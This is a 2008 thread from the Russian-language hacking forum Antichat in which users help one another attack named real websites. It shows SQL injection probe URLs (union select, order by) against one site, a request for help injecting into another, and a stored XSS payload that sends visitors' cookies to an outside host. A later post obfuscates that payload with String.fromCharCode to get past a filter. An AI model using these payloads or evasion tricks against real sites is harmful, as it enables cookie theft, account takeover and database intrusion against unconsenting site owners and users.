ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.04.2008, 16:19
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Кто-то постарался знач : ) Пасип что разъяснил:Р
Последний раз редактировалось Велемир; 10.04.2008 в 16:23..
|
|
|
10.04.2008, 16:21
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
information_schema присутствует с версии 5 и далее
|
|
|
|
10.04.2008, 16:24
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от Basurman
information_schema присутствует с версии 5 и далее
Хыхы,а я и забыл ))))
|
|
|
|
10.04.2008, 16:26
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
http://www.prstyle.ru/index.php?id=47+union+select+1,2,3,4/*
По какой причине вылазит:
The used SELECT statements have a different number of columns
?
Использование select имеет неправильный номер в колонке, как-то так.. |
|
|
|
10.04.2008, 16:30
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
Ershik, там 3 колонки
http://www.prstyle.ru/index.php?id=47+order+by+4/*
http://www.prstyle.ru/index.php?id=47+order+by+3/*
|
|
|
|
10.04.2008, 16:36
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Точно, три колонки и xss в поиске
Спасибо, разобрался.
|
|
|
|
10.04.2008, 17:57
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Всем прива ! У меня следующая проблема, проворачиваю активную ксс, код получился таким - <body onload=img = new Image(); img.src = "http://s.netsec.ru/xxx.gif?"+document.cookie;>
Но символ / фильтруется, вернее даже не фильтруется, а все, что идет после него, обрубается, включая символ, можно ли что нибудь при таком раскладе сделать ?
|
|
|
|
10.04.2008, 18:29
|
|
Постоянный
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635
Репутация:
2407
|
|
Можно строку "http://s.netsec.ru/xxx.gif?" зашифровать в ASCII-коды, а потом яваскриптом расшифровывать с помощью String.fromCharCode();
Например:
Код:
String.fromCharCode(104,116,116,112,58,47, 47,115,46,110,101,116, 115,101,99,46,114,117,47, 120,120,120,46,103,105,102,63);
//это вернёт строку http://s.netsec.ru/xxx.gif?
А финальный вариант без ошибок примерно такой:
Код:
<body onload="javascript:img = new Image(); img.src = String.fromCharCode(104,116,116,112,58,47, 47,115,46,110,101,116, 115,101,99,46,114,117,47, 120,120,120,46,103,105,102,63);+document.cookie;">
Последний раз редактировалось d_x; 10.04.2008 в 18:35..
|
|
|
|
10.04.2008, 22:50
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
пожайлусто помогите разработать sql иньекцию
http://www.prodai.user.kz/index.php?id=68296&fid=5'
|
|
|
|
10.04.2008, 23:04
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от ZET36
пожайлусто помогите разработать sql иньекцию
http://www.prodai.user.kz/index.php?id=68296&fid=5'
Больше на раскрытие пути похоже:Р
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид